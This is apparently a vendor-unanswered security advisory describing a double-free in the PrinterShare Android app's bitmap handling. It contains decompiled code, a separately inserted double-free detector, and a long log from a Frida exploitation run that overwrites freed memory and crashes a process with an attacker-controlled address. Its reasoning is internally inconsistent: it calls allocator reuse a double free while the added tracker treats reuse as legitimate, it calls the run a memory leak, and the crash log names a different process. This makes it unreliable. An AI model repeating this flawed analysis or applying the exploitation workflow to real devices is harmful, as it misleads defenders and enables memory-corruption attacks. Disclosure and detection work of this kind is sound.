Affected Systems
Discovered By
Vulnerability Details
Vulnerability Description
A double-free condition occurs during the cleanup of temporary image files, which can be exploited to achieve memory corruption and potentially arbitrary code execution.
Technical Description
- Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite)
- Using Frida client on Ubuntu 24.04 LTS - Frida server on Samsung Rooted Device.
- Playstore location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US
- The target Activity is exported (android:exported="true"), which means any other application can interact with it, provided the required permissions are granted.
The vulnerability is in the bitmap handling in ActivityPrintPictures. The v1() method loads bitmaps from files or content URIs. The method then calls x1() after attempting to decode a bitmap. In the exception handler for OutOfMemoryError, it recycles the bitmap.

The x1() method (visible in the Frida hooks) creates a 512x512 bitmap and immediately recycles it. An OutOfMemoryError happens during bitmap loading in v1(); the bitmap is recycled in the error handler.
public Bitmap v1(l lVar) {
    Bitmap bitmap = null;
    boolean z2 = false;
    // Up to three decode attempts, halving the sample size each time.
    for (int i3 = 0; i3 < 3; i3++) {
        try {
            B.e();
            BitmapFactory.Options options = new BitmapFactory.Options();
            options.inPreferredConfig = Bitmap.Config.ARGB_8888;
            options.inDither = false;
            if (i3 > 0) {
                options.inSampleSize = 1 << i3;
            }
            InputStream fileInputStream = lVar.f5200c != null ? new FileInputStream(lVar.f5200c) : getContentResolver().openInputStream(lVar.f5198a);
            if (fileInputStream != null) {
                bitmap = BitmapFactory.decodeStream(fileInputStream, null, options);
                fileInputStream.close();
            }
            x1();
            break;
        } catch (IOException e3) {
            e3.printStackTrace();
            B.A(e3);
        } catch (OutOfMemoryError unused) {
            // OOM handler: the partially decoded bitmap is recycled here.
            if (bitmap != null) {
                bitmap.recycle();
                bitmap = null;
            }
            if (!z2 && i3 > 0) {
                B.a();
                z2 = true;
            }
        }
    }
    return bitmap;
}
Then x1() is called, which creates and recycles another bitmap.
private void x1() {
    Bitmap createBitmap = Bitmap.createBitmap(512, 512, Bitmap.Config.ARGB_8888);
    if (createBitmap != null) {
        createBitmap.recycle();
    }
}
The Android memory allocator may reuse the same memory block, which results in the same address being freed twice (double-free).
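As an added example (not the advisory's proof of concept, nor code from the PrinterShare application), the following shows how a defender would detect the condition described above at runtime: a Frida-style tracker that records every address passed to free() and flags a second free of the same address when no allocation has returned that address in between. The event stream is constructed by hand to mirror the v1()/x1() sequence; its addresses and the "where" labels are placeholders. The Frida wiring at the bottom is an assumption about how the tracker would be attached to libc's malloc/free with the Frida 16 API and only runs inside a Frida agent; under plain Node.js it is skipped and the replay over the sample events runs instead.

```javascript
// Added example, not the advisory's PoC. Tracks malloc()/free() events and
// reports a free of an address that is already in the freed state without an
// intervening allocation of that same address (allocator reuse is legitimate).
class DoubleFreeTracker {
  constructor() {
    this.freed = new Map();   // address -> number of frees since last alloc
    this.findings = [];
  }

  // An allocation returning `addr` makes a later free() legitimate again.
  onAlloc(addr) {
    this.freed.delete(addr);
  }

  // Returns true when this free() is a double free of `addr`.
  onFree(addr, where) {
    if (addr === '0x0') return false;            // free(NULL) is a no-op
    if (this.freed.has(addr)) {
      const count = this.freed.get(addr) + 1;
      this.freed.set(addr, count);
      this.findings.push({ addr, where, count });
      return true;
    }
    this.freed.set(addr, 1);
    return false;
  }
}

// Constructed sample event stream (placeholder addresses), modelled on the
// sequence the advisory describes:
//  1. v1() decodes into buffer A, then the OOM handler recycles it (free A)
//  2. x1() creates a 512x512 bitmap, the allocator reuses A, recycle frees it
//  3. a further free of A with no allocation in between -> double free
const SAMPLE_EVENTS = [
  { op: 'alloc', addr: '0x7820205700', where: 'v1/decodeStream' },
  { op: 'free',  addr: '0x7820205700', where: 'v1/OutOfMemoryError handler' },
  { op: 'alloc', addr: '0x7820205700', where: 'x1/createBitmap' },
  { op: 'free',  addr: '0x7820205700', where: 'x1/recycle' },
  { op: 'free',  addr: '0x7820205700', where: 'v1/OutOfMemoryError handler' },
  { op: 'free',  addr: '0x0',          where: 'unrelated free(NULL)' },
];

// Replays an event stream through the tracker and returns its findings.
function replay(events) {
  const tracker = new DoubleFreeTracker();
  for (const e of events) {
    if (e.op === 'alloc') tracker.onAlloc(e.addr);
    else tracker.onFree(e.addr, e.where);
  }
  return tracker.findings;
}

// Hypothetical Frida wiring (assumed Frida 16 API); only active inside an agent.
if (typeof Interceptor !== 'undefined' && typeof Module !== 'undefined') {
  const tracker = new DoubleFreeTracker();
  Interceptor.attach(Module.getExportByName('libc.so', 'malloc'), {
    onLeave(retval) { tracker.onAlloc(retval.toString()); },
  });
  Interceptor.attach(Module.getExportByName('libc.so', 'free'), {
    onEnter(args) {
      if (tracker.onFree(args[0].toString(), 'free')) {
        console.log('[!] double free of ' + args[0] + '\n' +
          Thread.backtrace(this.context, Backtracer.ACCURATE)
            .map(DebugSymbol.fromAddress).join('\n'));
      }
    },
  });
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' &&
    require.main === module) {
  console.log(JSON.stringify(replay(SAMPLE_EVENTS), null, 2));
}
```

Replaying the sample stream yields exactly one finding, for the third free of the same address; the second free is not reported because the allocator handed that address out again in between, which is the case the naive "same address freed twice" heuristic would misreport. The backtrace printed from the Frida hook is what lets an analyst attribute the second free to a Java call site such as Bitmap.recycle().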
The memory leak is demonstrated by running the Frida script, which first intercepts freed memory chunks, then writes to that memory and monitors the cache:
$ frida -U -f com.dynamixsoftware.printershare -l exploit.js
____
/ _ | Frida 16.6.5 - A world-class dynamic instrumentation toolkit
| (_| |
> _ | Commands:
/_/ |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://frida.re/docs/home/
. . . .
. . . . Connected to SM T220 (id=R83X10JATAV)
Spawning `com.dynamixsoftware.printershare`...
[+] Found 'free' function at 0x78b4adbf30 in module: libc.so
[+] Double-free exploitation script initialized
[+] Targeting the v1()->x1() bitmap handling vulnerability
[+] Waiting for free() calls to intercept...
Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
[SM T220::com.dynamixsoftware.printershare ]->
...SNIP...
=== Memory at 0xb400007820205700 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb400007820205700
=== Memory at 0xb4000078202ad320 BEFORE overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 4d dalvik/system/VM
00000010 52 75 6e 74 69 6d 65 00 65 61 64 3b 00 00 00 00 Runtime.ead;....
00000020 10 71 a1 1d 78 00 00 00 ff ff ff ff ff ff ff ff .q..x...........
00000030 00 00 00 00 00 00 00 00 20 d3 2a 20 78 00 00 b4 ........ .* x...
00000040 01 00 00 00 02 00 00 00 08 8a 31 20 78 00 00 b4 ..........1 x...
00000050 00 00 00 00 00 00 00 00 60 d2 2a 20 78 00 00 b4 ........`.* x...
00000060 41 84 07 1d 78 00 00 00 00 66 2f 20 78 00 00 b4 A...x....f/ x...
00000070 00 00 00 00 00 00 00 00 98 d2 2a 20 78 00 00 b4 ..........* x...
[+] Successfully wrote 500 bytes to 0xb4000078202ad320
=== Memory at 0xb4000078202ad320 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb4000078202ad320
=== Memory at 0xb4000078202ad300 BEFORE overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 4c 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 Ldalvik/system/V
00000010 4d 52 75 6e 74 69 6d 65 3b 00 00 00 1e 00 00 00 MRuntime;.......
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Successfully wrote 500 bytes to 0xb4000078202ad300
=== Memory at 0xb4000078202ad300 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb4000078202ad300
=== Memory at 0xb4000078202ad2e0 BEFORE overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 64 61 6c 76 69 6b 2e 73 79 73 74 65 6d 2e 56 4d dalvik.system.VM
00000010 52 75 6e 74 69 6d 65 00 61 64 00 20 78 00 00 b4 Runtime.ad. x...
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Successfully wrote 500 bytes to 0xb4000078202ad2e0
=== Memory at 0xb4000078202ad2e0 AFTER overwrite ===
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0...
[+] Immediate exploitation succeeded for 0xb4000078202ad2e0
Process crashed: Bad access due to invalid address
***
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
Revision: '0'
ABI: 'arm64'
Processor: '0'
Timestamp: 2025-03-02 10:54:25.642520460-0800
Process uptime: 3s
Cmdline: com.samsung.android.scs
pid: 32625, tid: 32625, name: ung.android.scs >>> com.samsung.android.scs <<<
uid: 10243
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414140
x0 0000000000000001 x1 4141414141414141 x2 0000000072a27ffc x3 0000000000000001
x4 0000007feb0e8530 x5 000000781d065ee0 x6 000000000000001a x7 0000000000000018
x8 0000007feb0e87c0 x9 4141414141414140 x10 0000007feb0e8150 x11 0000000000000006
x12 0000000000000069 x13 000000781dc0e180 x14 000000781dc0c598 x15 0000000000000000
x16 0000000020000001 x17 0000000000000000 x18 00000078ccb6a000 x19 b400007820205650
x20 b400007820205660 x21 0000000072e625d0 x22 4141414141414141 x23 000000781d776d80
x24 b4000078202cd400 x25 00000078cc4c1000 x26 000000781dc0d000 x27 0000007feb0e8960
x28 b400007820244800 x29 0000007feb0e8900
lr 000000781d2cc408 sp 0000007feb0e86d0 pc 000000781d2cc190 pst 0000000080000000
backtrace:
#00 pc 00000000002cc190 /apex/com.android.art/lib64/libart.so (artQuickResolutionTrampoline+2764) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
#01 pc 000000000037ee08 /apex/com.android.art/lib64/libart.so (art_quick_resolution_trampoline+88) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
#02 pc 0000000000780108 /apex/com.android.art/lib64/libart.so (nterp_helper+152) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
#03 pc 000000000003fb3a /apex/com.android.conscrypt/javalib/conscrypt.jar (com.android.org.conscrypt.TrustedCertificateStore.setDefaultUserDirectory+14)
#04 pc 0000000000b716dc /data/misc/apexdata/com.android.art/dalvik-cache/arm64/boot.oat (android.app.ActivityThread.main+764)
***
[SM T220::com.dynamixsoftware.printershare ]->
Mitigation and Remediation Recommendation
No response from vendor. There are no known mitigations for end users of the affected application versions.
Credit
This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.
Proof of Concept
URL: https://www.korelogic.com/advisories/KL-001-2025-005.poc.js.txt
SHA256sum: 596c119c3b1ef6749d59ff5def5b2e88bca04dde15e86683d074d259458519da
The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Disclosure Timeline
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.
KoreLogic public disclosure.
Responsible Disclosure
KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.